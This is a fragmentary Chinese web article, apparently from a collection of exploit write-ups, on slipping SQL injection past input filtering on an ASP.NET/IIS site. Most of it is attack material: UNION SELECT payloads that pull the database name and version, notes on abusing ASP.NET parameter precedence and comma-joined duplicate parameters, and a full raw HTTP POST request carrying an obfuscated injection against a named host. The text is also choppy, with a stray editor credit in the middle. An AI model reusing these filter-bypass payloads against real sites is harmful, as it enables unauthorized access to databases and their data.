测试环境
方法一:SQL语句拦截 www.d123.com/news.aspx?id=1 union select
string id = Request.Params[“id”];
cookie->post->get
-1 union select 1,db_name(),@@version
本文由“壹伴编辑器”提供技术支持 方法二 string id = Request.Params[“id”];
Asp.net iis:id=1,2,3
POST /news.aspx?id=1.8eunion/ HTTP/1.1 Host: www.d123.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Cookie: _d_id=4400020b0469c82ad109c2a344f34a
Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 40 id=%001/select 1,@@version,db_name()– end |
|
来自: 小灰灰i58u7w06 > 《漏洞利用文章》